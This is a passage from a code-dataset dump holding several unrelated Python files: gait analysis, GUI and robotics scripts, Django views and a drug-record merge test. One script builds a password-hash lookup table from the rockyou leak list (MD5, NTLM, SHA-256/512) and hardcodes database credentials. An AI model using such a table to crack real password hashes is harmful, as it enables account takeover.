right_FPAs])\n\n def get_FPA_steps(self, gait_data_df, FPA_all, steps):\n FPA_steps = []\n for step in steps:\n sample_20_gait_phase = int(round(step[0] + 0.2 * (step[1] - step[0])))\n sample_80_gait_phase = int(round(step[0] + 0.8 * (step[1] - step[0])))\n FPA_step = np.mean(FPA_all[sample_20_gait_phase:sample_80_gait_phase])\n marker_frame = gait_data_df.loc[round((step[0] + step[1]) / 2), 'marker_frame']\n FPA_steps.append([FPA_step, marker_frame])\n return FPA_steps\n\n def get_legal_steps(self, strikes, offs, side, gait_data_df=None):\n \"\"\"\n Sometimes subjects have their both feet on the ground so it is necessary to do step check.\n :param strikes:\n :param offs:\n :param side:\n :param gait_data_df:\n :return:\n \"\"\"\n stance_phase_sample_thd_lower = 0.3 * self._current_fre\n stance_phase_sample_thd_higher = 1 * self._current_fre\n\n strike_tuple = np.where(strikes == 1)[0]\n off_tuple = np.where(offs == 1)[0]\n steps = []\n abandoned_step_num = 0\n\n for strike in strike_tuple:\n off = off_tuple[strike + stance_phase_sample_thd_lower < off_tuple]\n off = off[off < strike + stance_phase_sample_thd_higher]\n if len(off) == 1:\n off = off[0]\n steps.append([strike, off])\n else:\n abandoned_step_num += 1\n\n print('For {side} foot steps, {step_num} steps abandonded'.format(side=side, step_num=abandoned_step_num))\n if self.__check_steps:\n plt.figure()\n if side == 'l':\n grf_z = gait_data_df['f_1_z'].values\n elif side == 'r':\n grf_z = gait_data_df['f_2_z'].values\n else:\n raise ValueError('Wrong side value')\n\n for step in steps:\n plt.plot(grf_z[step[0]:step[1]])\n plt.show()\n return steps\n\n def insert_param_data(self, gait_data_df, insert_list, column_name):\n data_len = gait_data_df.shape[0]\n insert_data = np.zeros([data_len])\n for item in insert_list:\n row_index = gait_data_df.index[gait_data_df['marker_frame'] == item[1]]\n if len(row_index) == 0:\n row_index = gait_data_df.index[gait_data_df['marker_frame'] == item[1] + 1]\n insert_data[row_index[0]] = item[0]\n gait_data_df.insert(len(gait_data_df.columns), column_name, insert_data)\n\n @staticmethod\n def __law_of_cosines(vector1, vector2):\n vector3 = vector1 - vector2\n num = inner1d(vector1, vector1) + \\\n inner1d(vector2, vector2) - inner1d(vector3, vector3)\n den = 2 * np.sqrt(inner1d(vector1, vector1)) * np.sqrt(inner1d(vector2, vector2))\n return 180 / np.pi * np.arccos(num / den)\n\n\nclass TrunkStaticProcessor(ParamProcessor):\n def __init__(self, sub_name, readme_xls, plot_strike_off=False,\n initialize_100Hz=True, initialize_200Hz=True):\n super().__init__(sub_name, readme_xls, trials=[], plot_strike_off=plot_strike_off,\n initialize_100Hz=initialize_100Hz, initialize_200Hz=initialize_200Hz)\n self._trials = ['static trunk']\n\n def init_trial_params(self, gait_data_df, sensor_sampling_rate):\n trunk_ml_angle, trunk_ap_angle = self.get_trunk_angles(gait_data_df)\n # self.check_trunk_angles(trunk_ml_angle, trunk_ap_angle)\n param_data = np.column_stack([trunk_ml_angle, trunk_ap_angle])\n param_data_df = pd.DataFrame(param_data)\n param_data_df.columns = ['trunk_ml_angle', 'trunk_ap_angle']\n param_data_df.insert(0, 'marker_frame', gait_data_df['marker_frame'])\n return param_data_df\n","sub_path":"1_param_processing/ParameterProcessor.py","file_name":"ParameterProcessor.py","file_ext":"py","file_size_in_byte":20234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"268201778","text":"from tkinter import *\nMainWindow = Tk()\n\ncounter = 0\n\ndef fungsi_1():\n\tglobal counter\n\tcounter +=1\n\tprint('hello world ',counter)\n\tLabel1.config(text=counter)\n\ndef fungsi_2():\n\tglobal counter\n\tcounter -=1\n\tprint('hello world ',counter)\n\tLabel1.config(text=counter)\n\nButton1 = Button(MainWindow, text='+', command=fungsi_1)\nButton2 = Button(MainWindow, text='-', command=fungsi_2)\nLabel1 = Label(MainWindow, text = '0')\n\nLabel1.pack()\nButton1.pack(side = LEFT)\nButton2.pack(side = LEFT)\nMainWindow.geometry('400x400+200+200')\nMainWindow.mainloop()","sub_path":"Gui-Button/Btn.py","file_name":"Btn.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"434663924","text":"import psycopg2\nfrom psycopg2.extensions import AsIs\nimport sys\nimport time\nimport hashlib\n\ntry:\n conn = psycopg2.connect(\n dbname='rainbowtables',\n user='imtadmin',\n host='localhost',\n password='5tgb6yhn'\n )\n\n print(\"You are connected to 'rainbowtables'!\")\n\n cur = conn.cursor()\n f = open('rockyou.txt', encoding='ISO-8859-1')\n f2 = open('top_100_pw')\n count = 0\n for l in f:\n rank = 0\n found = False\n actual_line = l.strip('\\n')\n for line in f2:\n stripped_line = line.strip('\\n')\n rank = int(stripped_line.split(' ')[0])\n curr_pw = stripped_line.split(' ')[1]\n if actual_line == curr_pw:\n found = True\n break\n f2.seek(0)\n\n encoded = actual_line.encode()\n encoded_utf16le = actual_line.encode('utf-16le')\n\n m = str(hashlib.md5(encoded).hexdigest())\n s2 = str(hashlib.sha256(encoded).hexdigest())\n s5 = str(hashlib.sha512(encoded).hexdigest())\n n = str(hashlib.new('md4', encoded_utf16le).hexdigest())\n\n if found:\n sql = 'INSERT INTO rainbow VALUES(DEFAULT, %s, 0, 0, true, %s, %s, %s, %s, %s);'\n cur.execute(sql, (actual_line,rank,m,n,s2,s5))\n elif not found:\n sql = 'INSERT INTO rainbow VALUES(DEFAULT, %s, 0, 0, true, -1, %s, %s, %s, %s);'\n cur.execute(sql, (actual_line,m,n,s2,s5))\n count += 1\n print(count)\n conn.commit()\n\nexcept psycopg2.DatabaseError as e:\n if conn:\n conn.rollback()\n print(\"Error at line %s: %s\" % (str(count),e))\n sys.exit(1)\n\nfinally:\n if conn:\n conn.close()","sub_path":"insert_database.py","file_name":"insert_database.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"607264618","text":"\"\"\"Test merged record generation.\"\"\"\nimport pytest\nfrom therapy.etl.merge import Merge\nfrom therapy.schemas import ApprovalStatus\nfrom typing import Dict\n\n\n@pytest.fixture(scope='module')\ndef merge_handler(mock_database):\n \"\"\"Provide Merge instance to test cases.\"\"\"\n class MergeHandler:\n def __init__(self):\n self.merge = Merge(mock_database())\n\n def get_merge(self):\n return self.merge\n\n def create_merged_concepts(self, record_ids):\n return self.merge.create_merged_concepts(record_ids)\n\n def get_added_records(self):\n return self.merge._database.added_records\n\n def get_updates(self):\n return self.merge._database.updates\n\n def create_record_id_set(self, record_id):\n return self.merge._create_record_id_set(record_id)\n\n def generate_merged_record(self, record_id_set):\n return self.merge._generate_merged_record(record_id_set)\n\n def get_created_id_groups(self):\n return self.merge._groups()\n\n return MergeHandler()\n\n\ndef compare_merged_records(actual: Dict, fixture: Dict):\n \"\"\"Check that records are identical.\"\"\"\n assert actual['concept_id'] == fixture['concept_id']\n assert actual['label_and_type'] == fixture['label_and_type']\n assert ('label' in actual) == ('label' in fixture)\n if 'label' in actual or 'label' in fixture:\n assert actual['label'] == fixture['label']\n assert ('trade_names' in actual) == ('trade_names' in fixture)\n if 'trade_names' in actual or 'trade_names' in fixture:\n assert set(actual['trade_names']) == set(fixture['trade_names'])\n assert ('aliases' in actual) == ('aliases' in fixture)\n if 'aliases' in actual or 'aliases' in fixture:\n assert set(actual['aliases']) == set(fixture['aliases'])\n\n assert ('xrefs' in actual) == ('xrefs' in fixture)\n if 'xrefs' in actual or 'xrefs' in fixture:\n assert set(actual['xrefs']) == set(fixture['xrefs'])\n assert ('associated_with' in actual) == ('associated_with' in fixture)\n if 'associated_with' in actual or 'associated_with' in fixture:\n assert set(actual['associated_with']) == \\\n set(fixture['associated_with'])\n\n assert ('approval_status' in actual) == ('approval_status' in fixture)\n if 'approval_status' in actual or 'approval_status' in fixture:\n assert set(actual['approval_status']) == \\\n set(fixture['approval_status'])\n assert ('approval_year' in actual) == ('approval_year' in fixture)\n if 'approval_year' in actual or 'approval_year' in fixture:\n assert set(actual['approval_year']) == set(fixture['approval_year'])\n assert ('fda_indication' in actual) == ('fda_indication' in fixture)\n if 'fda_indication' in actual or 'fda_indication' in fixture:\n actual_inds = actual['fda_indication'].copy()\n fixture_inds = fixture['fda_indication'].copy()\n assert len(actual_inds) == len(fixture_inds)\n actual_inds.sort(key=lambda x: x[0])\n fixture_inds.sort(key=lambda x: x[0])\n for i in range(len(actual_inds)):\n assert actual_inds[i] == fixture_inds[i]\n\n\n@pytest.fixture(scope='module')\ndef phenobarbital_merged():\n \"\"\"Create phenobarbital fixture.\"\"\"\n return {\n \"label_and_type\": \"rxcui:8134##merger\",\n \"concept_id\": \"rxcui:8134\",\n \"xrefs\": [\n \"ncit:C739\",\n \"drugbank:DB01174\",\n \"chemidplus:50-06-6\",\n \"wikidata:Q407241\"\n ],\n \"aliases\": [\n '5-Ethyl-5-phenyl-2,4,6(1H,3H,5H)-pyrimidinetrione',\n '5-Ethyl-5-phenyl-pyrimidine-2,4,6-trione',\n '5-Ethyl-5-phenylbarbituric acid',\n '5-Phenyl-5-ethylbarbituric acid',\n '5-ethyl-5-phenyl-2,4,6(1H,3H,5H)-pyrimidinetrione',\n '5-ethyl-5-phenylpyrimidine-2,4,6(1H,3H,5H)-trione',\n 'Acid, Phenylethylbarbituric',\n 'APRD00184',\n 'Fenobarbital',\n 'Luminal®',\n 'PHENO',\n 'Phenemal',\n 'PHENOBARBITAL',\n 'PHENobarbital',\n 'Phenobarbital',\n 'Phenobarbital (substance)',\n 'Phenobarbital-containing product',\n 'Phenobarbitol',\n 'Phenobarbitone',\n 'Phenobarbituric Acid',\n 'Phenylaethylbarbitursaeure',\n 'Phenylbarbital',\n 'Phenylethylbarbiturate',\n 'Phenylethylbarbituric Acid',\n 'Phenylethylbarbitursaeure',\n 'Phenyläthylbarbitursäure',\n 'Phenylethylbarbitursäure',\n 'PHENYLETHYLMALONYLUREA',\n 'Phenylethylmalonylurea',\n 'Product containing phenobarbital (medicinal product)',\n 'fenobarbital',\n 'phenobarbital',\n 'phenobarbital sodium',\n 'phenylethylbarbiturate'\n ],\n \"associated_with\": [\n \"pubchem.compound:4763\",\n \"usp:m63400\",\n \"gsddb:2179\",\n \"snomedct:51073002\",\n \"vandf:4017422\",\n \"mmsl:2390\",\n \"msh:D010634\",\n \"snomedct:373505007\",\n \"mmsl:5272\",\n \"mthspl:YQE403BP4D\",\n \"fdbmk:001406\",\n \"mmsl:d00340\",\n \"atc:N03AA02\",\n \"fda:YQE403BP4D\",\n \"umls:C0031412\",\n \"chebi:CHEBI:8069\",\n \"chembl:CHEMBL40\"\n ],\n \"label\": \"Phenobarbital\",\n }\n\n\n@pytest.fixture(scope='module')\ndef cisplatin_merged():\n \"\"\"Create cisplatin fixture.\"\"\"\n return {\n \"label_and_type\": \"rxcui:2555##merger\",\n \"concept_id\": \"rxcui:2555\",\n \"xrefs\": [\n \"ncit:C376\",\n \"drugbank:DB00515\",\n \"hemonc:105\",\n \"chemidplus:15663-27-1\",\n \"wikidata:Q412415\",\n \"wikidata:Q47522001\"\n ],\n \"trade_names\": [\n \"Cisplatin\",\n \"Platinol\"\n ],\n \"aliases\": [\n '1,2-Diaminocyclohexaneplatinum II citrate',\n 'APRD00359',\n 'CDDP',\n 'CISplatin',\n 'Cis-DDP',\n 'CIS-DDP',\n 'DACP',\n 'DDP',\n 'Diamminodichloride, Platinum',\n 'Dichlorodiammineplatinum',\n 'Platinum Diamminodichloride',\n 'cis Diamminedichloroplatinum',\n 'cis Platinum',\n 'cis-Diaminedichloroplatinum',\n 'cis-Diamminedichloroplatinum',\n 'cis-diamminedichloroplatinum(II)',\n 'cis-Diamminedichloroplatinum(II)',\n 'cis-Dichlorodiammineplatinum(II)',\n 'cisplatinum',\n 'cis-Platinum',\n 'cis-platinum',\n 'cisplatino',\n 'cis-diamminedichloroplatinum(II)',\n 'cis-diamminedichloroplatinum III',\n 'NSC 119875',\n 'Platinol-AQ',\n 'Platinol'\n ],\n \"label\": \"cisplatin\",\n \"associated_with\": [\n \"umls:C0008838\",\n \"fda:Q20Q21Q62J\",\n \"usp:m17910\",\n \"vandf:4018139\",\n \"mesh:D002945\",\n \"mthspl:Q20Q21Q62J\",\n \"mmsl:d00195\",\n \"atc:L01XA01\",\n \"mmsl:31747\",\n \"mmsl:4456\",\n \"pubchem.compound:5702198\",\n \"unii:Q20Q21Q62J\",\n \"inchikey:LXZZYRPGZAFOLE-UHFFFAOYSA-L\",\n \"chembl:CHEMBL11359\",\n ],\n \"approval_status\": ApprovalStatus.APPROVED,\n \"approval_year\": [\"1978\"],\n \"fda_indication\": [\n [\"hemonc:671\", \"Testicular cancer\", \"ncit:C7251\"],\n [\"hemonc:645\", \"Ovarian cancer\", \"ncit:C7431\"],\n [\"hemonc:569\", \"Bladder cancer\", \"ncit:C9334\"]\n ],\n }\n\n\n@pytest.fixture(scope='module')\ndef spiramycin_merged():\n \"\"\"Create fixture for spiramycin. The RxNorm entry should be inaccessible\n to this group.\n \"\"\"\n return {\n \"label_and_type\": \"ncit:c839##merger\",\n \"concept_id\": \"ncit:C839\",\n \"xrefs\": [\n 'chemidplus:8025-81-8',\n ],\n \"label\": \"Spiramycin\",\n \"aliases\": [\n \"SPIRAMYCIN\",\n \"Antibiotic 799\",\n \"Rovamycin\",\n \"Provamycin\",\n \"Rovamycine\",\n \"RP 5337\",\n \"(4R,5S,6R,7R,9R,10R,11E,13E,16R)-10-{[(2R,5S,6R)-5-(dimethylamino)-6-methyltetrahydro-2H-pyran-2-yl]oxy}-9,16-dimethyl-5-methoxy-2-oxo-7-(2-oxoethyl)oxacyclohexadeca-11,13-dien-6-yl 3,6-dideoxy-4-O-(2,6-dideoxy-3-C-methyl-alpha-L-ribo-hexopyranosyl)-3-(dimethylamino)-alpha-D-glucopyranoside\" # noqa: E501\n ],\n \"associated_with\": [\n \"umls:C0037962\",\n \"fda:71ODY0V87H\"\n ],\n }\n\n\n@pytest.fixture(scope='module')\ndef record_id_groups():\n \"\"\"Create fixture for concept group sets.\"\"\"\n return {\n \"rxcui:8134\": {\n \"rxcui:8134\",\n \"ncit:C739\",\n \"chemidplus:50-06-6\",\n \"wikidata:Q407241\",\n \"drugbank:DB01174\"\n },\n \"ncit:C739\": {\n \"rxcui:8134\",\n \"ncit:C739\",\n \"chemidplus:50-06-6\",\n \"wikidata:Q407241\",\n \"drugbank:DB01174\"\n },\n \"chemidplus:50-06-6\": {\n \"rxcui:8134\",\n \"ncit:C739\",\n \"chemidplus:50-06-6\",\n \"wikidata:Q407241\",\n \"drugbank:DB01174\"\n },\n \"wikidata:Q407241\": {\n \"rxcui:8134\",\n \"ncit:C739\",\n \"chemidplus:50-06-6\",\n \"wikidata:Q407241\",\n \"drugbank:DB01174\"\n },\n \"drugbank:DB01174\": {\n \"rxcui:8134\",\n \"ncit:C739\",\n \"chemidplus:50-06-6\",\n \"wikidata:Q407241\",\n \"drugbank:DB01174\"\n },\n \"ncit:C839\": {\n \"ncit:C839\",\n \"chemidplus:8025-81-8\",\n },\n \"chemidplus:8025-81-8\": {\n \"ncit:C839\",\n \"chemidplus:8025-81-8\",\n },\n \"rxcui:2555\": {\n \"rxcui:2555\",\n \"ncit:C376\",\n \"chemidplus:15663-27-1\",\n \"wikidata:Q412415\",\n \"wikidata:Q47522001\",\n \"drugbank:DB00515\",\n \"hemonc:105\"\n },\n \"ncit:C376\": {\n \"rxcui:2555\",\n \"ncit:C376\",\n \"chemidplus:15663-27-1\",\n \"wikidata:Q412415\",\n \"wikidata:Q47522001\",\n \"drugbank:DB00515\",\n \"hemonc:105\"\n },\n \"chemidplus:15663-27-1\": {\n \"rxcui:2555\",\n \"ncit:C376\",\n \"chemidplus:15663-27-1\",\n \"wikidata:Q412415\",\n \"wikidata:Q47522001\",\n \"drugbank:DB00515\",\n \"hemonc:105\"\n },\n \"wikidata:Q412415\": {\n \"rxcui:2555\",\n \"ncit:C376\",\n \"chemidplus:15663-27-1\",\n \"wikidata:Q412415\",\n \"wikidata:Q47522001\",\n \"drugbank:DB00515\",\n \"hemonc:105\"\n },\n \"wikidata:Q47522001\": {\n \"rxcui:2555\",\n \"ncit:C376\",\n \"chemidplus:15663-27-1\",\n \"wikidata:Q412415\",\n \"wikidata:Q47522001\",\n \"drugbank:DB00515\",\n \"hemonc:105\"\n },\n \"drugbank:DB00515\": {\n \"rxcui:2555\",\n \"ncit:C376\",\n \"chemidplus:15663-27-1\",\n \"wikidata:Q412415\",\n \"wikidata:Q47522001\",\n \"drugbank:DB00515\",\n \"hemonc:105\"\n },\n \"hemonc:105\": {\n \"rxcui:2555\",\n \"ncit:C376\",\n \"chemidplus:15663-27-1\",\n \"wikidata:Q412415\",\n \"wikidata:Q47522001\",\n \"drugbank:DB00515\",\n \"hemonc:105\"\n },\n \"rxcui:4126\": {\n \"rxcui:4126\",\n \"wikidata:Q47521576\",\n \"drugbank:DB01143\"\n },\n \"wikidata:Q47521576\": {\n \"rxcui:4126\",\n \"wikidata:Q47521576\",\n \"drugbank:DB01143\"\n },\n \"drugbank:DB01143\": {\n \"rxcui:4126\",\n \"wikidata:Q47521576\",\n \"drugbank:DB01143\"\n },\n \"ncit:C49236\": {\n \"ncit:C49236\"\n }\n }\n\n\ndef test_create_record_id_set(merge_handler, record_id_groups):\n \"\"\"Test creation of record ID sets. Queries DB and matches against\n record_id_groups fixture.\n \"\"\"\n # build groups from keys\n for record_id in record_id_groups.keys():\n new_group = merge_handler.create_record_id_set(record_id)\n for concept_id in new_group:\n merge_handler.merge._groups[concept_id] = new_group\n groups = merge_handler.merge._groups\n\n # perform checks\n for concept_id in groups.keys():\n assert groups[concept_id] == record_id_groups[concept_id]\n assert len(groups) == len(record_id_groups) # check if any are missing\n\n # test dead reference\n has_dead_ref = 'ncit:C107245'\n dead_group = merge_handler.create_record_id_set(has_dead_ref)\n assert dead_group == {has_dead_ref}\n\n\ndef test_generate_merged_record(merge_handler, record_id_groups,\n phenobarbital_merged, cisplatin_merged,\n spiramycin_merged):\n \"\"\"Test generation of merged record method.\"\"\"\n phenobarbital_ids = record_id_groups['rxcui:8134']\n merge_response = merge_handler.generate_merged_record(phenobarbital_ids)\n compare_merged_records(merge_response, phenobarbital_merged)\n\n cisplatin_ids = record_id_groups['rxcui:2555']\n merge_response = merge_handler.generate_merged_record(cisplatin_ids)\n compare_merged_records(merge_response, cisplatin_merged)\n\n spiramycin_ids = record_id_groups['ncit:C839']\n merge_response = merge_handler.generate_merged_record(spiramycin_ids)\n compare_merged_records(merge_response, spiramycin_merged)\n\n\ndef test_create_merged_concepts(merge_handler, record_id_groups,\n phenobarbital_merged, cisplatin_merged,\n spiramycin_merged):\n \"\"\"Test end-to-end creation and upload of merged concepts.\"\"\"\n record_ids = record_id_groups.keys()\n merge_handler.create_merged_concepts(record_ids)\n\n # check merged record generation and storage\n added_records = merge_handler.get_added_records()\n assert len(added_records) == 4\n\n phenobarb_merged_id = phenobarbital_merged['concept_id']\n assert phenobarb_merged_id in added_records.keys()\n compare_merged_records(added_records[phenobarb_merged_id],\n phenobarbital_merged)\n\n cispl_merged_id = cisplatin_merged['concept_id']\n assert cispl_merged_id in added_records.keys()\n compare_merged_records(added_records[cispl_merged_id], cisplatin_merged)\n\n spira_merged_id = spiramycin_merged['concept_id']\n assert spira_merged_id in added_records.keys()\n compare_merged_records(added_records[spira_merged_id],\n spiramycin_merged)\n\n # check merged record reference updating\n updates = merge_handler.get_updates()\n for concept_id in record_id_groups['rxcui:8134']:\n assert updates[concept_id] == {\n 'merge_ref': phenobarbital_merged['concept_id'].lower()\n }\n for concept_id in record_id_groups['rxcui:2555']:\n assert updates[concept_id] == {\n 'merge_ref': cisplatin_merged['concept_id'].lower()\n }\n for concept_id in record_id_groups['ncit:C839']:\n assert updates[concept_id] == {\n 'merge_ref': spiramycin_merged['concept_id'].lower()\n }\n\n # no merged record for ncit:C49236 should be generated\n assert len(updates) == len(record_id_groups) - 1\n assert 'ncit:C49236' not in updates\n","sub_path":"tests/unit/test_merge.py","file_name":"test_merge.py","file_ext":"py","file_size_in_byte":15663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"175723970","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Convert to a dictionary in one line code using list comprehension\n\n# In[1]:\n\n\nlist1=[1,2,3,4,5,7,8]\nlist2=[\"a\",\"b\",\"c\",\"d\",\"e\"]\n\n\n# In[2]:\n\n\nlist1 = [1, 2, 3,4, 5, 6, 7, 8]\nlist2 = [\"a\", \"b\", \"c\", \"d\", \"e\"]\nfor each in list1:\n list2.append((each))\nprint (list2)\n\n","sub_path":"Assignments6/Day6.py","file_name":"Day6.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"302927915","text":"#!/usr/bin/env python\n\nimport rospy\nimport os\nimport ctypes\nfrom beginner_tutorials.msg import Data\n\nif os.name == 'nt':\n import msvcrt\n def getch():\n return msvcrt.getch().decode()\nelse:\n import sys, tty, termios\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n def getch():\n try:\n tty.setraw(sys.stdin.fileno())\n ch = sys.stdin.read(1)\n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n return ch\n\n#os.sys.path.append('../dynamixel_functions_py') # Path setting\n\nimport dynamixel_functions as dynamixel # Uses Dynamixel SDK library\n\n# Control table address\nADDR_MX_TORQUE_ENABLE = 24 # Control table address is different in #Dynamixel model\nADDR_MX_GOAL_TORQUE = 71\nADDR_MX_TORQUE_CONT\t = 70\n\n# Data Byte Length\nLEN_MX_GOAL_TORQUE = 2\nLEN_MX_TORQUE_CTRL = 1\n\n# Protocol version\nPROTOCOL_VERSION = 1 # See which protocol version is used in the Dynamixel\n\n# Default setting\nDXL1_ID = 1 # Dynamixel ID: 1\n\nBAUDRATE = 1000000\nDEVICENAME = \"/dev/ttyUSB0\".encode('utf-8')# Check which port is being used on your controller\n # ex) Windows: \"COM1\" Linux: \"/dev/ttyUSB0\"\n\nTORQUE_ENABLE = 1 # Value for enabling the torque\nTORQUE_DISABLE = 0 # Value for disabling the torque\n\nDXL_MOVING_STATUS_THRESHOLD = 3 # Dynamixel moving status threshold\n\nESC_ASCII_VALUE = 0x1b\n\nCOMM_SUCCESS = 0 # Communication Success result value\nCOMM_TX_FAIL = -1001 # Communication Tx Failed\n\nport_num = dynamixel.portHandler(DEVICENAME)\n\n# Initialize PacketHandler Structs\ndynamixel.packetHandler()\n\n# Initialize Groupsyncwrite instance\ngroup_num = dynamixel.groupSyncWrite(port_num, PROTOCOL_VERSION, ADDR_MX_GOAL_TORQUE, LEN_MX_GOAL_TORQUE)\ntorque_mode_on = dynamixel.groupSyncWrite(port_num, PROTOCOL_VERSION, ADDR_MX_TORQUE_CONT, LEN_MX_TORQUE_CTRL)\n\ndxl_comm_result = COMM_TX_FAIL # Communication result\n\ndef callback(data):\n\trospy.loginfo(data.data)\n\tdxl_torcon(data.data)\n\ndef dxl_torcon(goal_torq):\n\t # Write goal position\n dynamixel.write2ByteTxRx(port_num, PROTOCOL_VERSION, 1, ADDR_MX_GOAL_TORQUE, goal_torq[0])\n if dynamixel.getLastTxRxResult(port_num, PROTOCOL_VERSION) != COMM_SUCCESS:\n dynamixel.printTxRxResult(PROTOCOL_VERSION, dynamixel.getLastTxRxResult(port_num, PROTOCOL_VERSION))\n elif dynamixel.getLastRxPacketError(port_num, PROTOCOL_VERSION) != 0:\n dynamixel.printRxPacketError(PROTOCOL_VERSION, dynamixel.getLastRxPacketError(port_num, PROTOCOL_VERSION))\n\ndef torque_ctrl():\n\tdynamixel.write1ByteTxRx(port_num, PROTOCOL_VERSION, 1, ADDR_MX_TORQUE_CONT, 1)\n\tif dynamixel.getLastTxRxResult(port_num, PROTOCOL_VERSION) != COMM_SUCCESS:\n\t dynamixel.printTxRxResult(PROTOCOL_VERSION, dynamixel.getLastTxRxResult(port_num, PROTOCOL_VERSION))\n\telif dynamixel.getLastRxPacketError(port_num, PROTOCOL_VERSION) != 0:\n\t dynamixel.printRxPacketError(PROTOCOL_VERSION, dynamixel.getLastRxPacketError(port_num, PROTOCOL_VERSION))\n\n\n\ndef dxl_init():\n\t\n\t# Initialize PortHandler Structs\n\t# Set the port path\n\t# Get methods and members of PortHandlerLinux or PortHandlerWindows\n\t\n\t# Open port\n\tif dynamixel.openPort(port_num):\n\t print(\"Succeeded to open the port!\")\n\telse:\n\t print(\"Failed to open the port!\")\n\t print(\"Press any key to terminate...\")\n\t getch()\n\t quit()\n\n\t# Set port baudrate\n\tif dynamixel.setBaudRate(port_num, BAUDRATE):\n\t print(\"Succeeded to change the baudrate!\")\n\telse:\n\t print(\"Failed to change the baudrate!\")\n\t print(\"Press any key to terminate...\")\n\t getch()\n\t quit()\n\n\t# Enable Dynamixel Torque\n\tfor i in xrange(1):\n\t\twhile 1:\n\t\t\tdynamixel.write1ByteTxRx(port_num, PROTOCOL_VERSION, i+1, ADDR_MX_TORQUE_ENABLE, TORQUE_ENABLE)\n\t\t\n\t\t\tif dynamixel.getLastTxRxResult(port_num, PROTOCOL_VERSION) != COMM_SUCCESS:\n\t\t\t dynamixel.printTxRxResult(PROTOCOL_VERSION, dynamixel.getLastTxRxResult(port_num, PROTOCOL_VERSION))\n\t\t\telif dynamixel.getLastRxPacketError(port_num, PROTOCOL_VERSION) != 0:\n\t\t\t dynamixel.printRxPacketError(PROTOCOL_VERSION, dynamixel.getLastRxPacketError(port_num, PROTOCOL_VERSION))\n\t\t\telse:\n\t\t\t print(\"Dynamixel %d has been successfully connected\" %(i+1))\n\t\t\t break\n\n\t\n\ndef listener():\n\n\trospy.init_node('listener3', anonymous=True)\n\trospy.Subscriber('tester2', Data, callback)\n\trospy.spin()\n\nif __name__ == '__main__':\n\tdxl_init()\n\ttorque_ctrl()\n\tlistener()\n","sub_path":"beginner_tutorials/scripts/listener4.py","file_name":"listener4.py","file_ext":"py","file_size_in_byte":4872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"334569323","text":"from django.shortcuts import render, redirect\nfrom django.views.generic import View\nfrom .models import Profile\nfrom addresses.models import Address\nfrom addresses.forms import AddressForm\n\n# Require Login\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\n\n# Messages toolkit\nfrom django.contrib import messages\n\n\n# User's main profile\nclass ProfileView(View):\n\t@method_decorator(login_required(login_url='accounts:login'))\n\tdef get(self, request):\n\t\ttemplate = 'accounts/profile.html'\n\n\t\t# User's profile picture url\n\t\tprofile = Profile.objects.get(user=request.user)\n\t\tphoto = profile.photo\n\n\t\t# User's Address(es)\n\t\taddresses = Address.objects.filter(user=request.user)\n\t\tform = \tAddressForm()\n\n\t\tcontext = {\n\t\t\t'photo': photo,\n\t\t\t'addresses': addresses,\n\t\t\t'form': form\n\t\t}\n\t\treturn render(request, template, context)\n\n\n# Edit User's Profile\nclass EditProfileView(View):\n\t@method_decorator(login_required(login_url='accounts:login'))\n\tdef get(self, request):\n\t\ttemplate = 'accounts/edit.html'\n\n\t\t# User's profile picture url\n\t\tprofile = Profile.objects.get(user=request.user)\n\t\tprofile_pic = profile.photo\n\n\t\t# User's Address(es)\n\t\taddresses = Address.objects.filter(user=request.user)\n\t\taddress_form = \tAddressForm()\n\n\t\tcontext = {\n\t\t\t'photo': profile_pic,\n\t\t\t'addresses': addresses,\n\t\t\t'address_form': address_form\n\t\t}\n\t\treturn render(request, template, context)\n\n\tdef post(self, request):\n\t\taddress_form = AddressForm(request.POST)\n\n\t\tif address_form.is_valid():\n\t\t\tnew_address = address_form.save(commit=False)\n\t\t\tnew_address.user = request.user\n\t\t\tnew_address.save()\n\t\t\tmessages.success(request, \"Direccion guardada con exito\")\n\t\telse:\n\t\t\tmessages.error(request, \"No se pudo guardar la direccion\")\n\n\t\treturn redirect('accounts:profile')\n\n","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"246158220","text":"\"\"\"\nInput: two strings\nOutput: True or False\nDescription: Checks whether the characters in the first string\nappear in order in the second string \n\"\"\"\n\ndef isSubsequence(sub,string):\n\n if len(sub) == 0 or len(string) == 0:\n return False\n\n pointer = 0\n\n for x in string:\n if sub[pointer] == x:\n if pointer == len(sub) - 1:\n return True\n else:\n pointer += 1\n\n return False\n\ndef isSubsequenceResursive(string1,string2):\n if len(string1) == 0:\n return True # since it would mean we found everything in string 1 in string 2\n \n if len(string2) == 0:\n return False\n \n if string1[0] ==string2[0]:\n return isSubsequenceResursive(string1[1:len(string1)],string2[1:len(string2)])\n \n return isSubsequenceResursive(string1,string2[1:len(string2)])\n\n\"\"\"\nWhen ever you do any slicing in python it needs to be using\nthe \":\" operator\n\"\"\"\n\nif __name__ == \"__main__\":\n print(\"isSubsequence\")\n print(isSubsequence('hello','hello world'))\n print(isSubsequence('sing','sting'))\n print(isSubsequence('abc','abracadabra'))\n print(isSubsequence('abc','acb')) \n\n print(\"isSubsequenceResursive\")\n print(isSubsequenceResursive('hello','hello world'))\n print(isSubsequenceResursive('sing','sting'))\n print(isSubsequenceResursive('abc','abracadabra'))\n print(isSubsequenceResursive('abc','acb'))\n\n\n","sub_path":"Old/ColtSteele/isSubsequence.py","file_name":"isSubsequence.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} 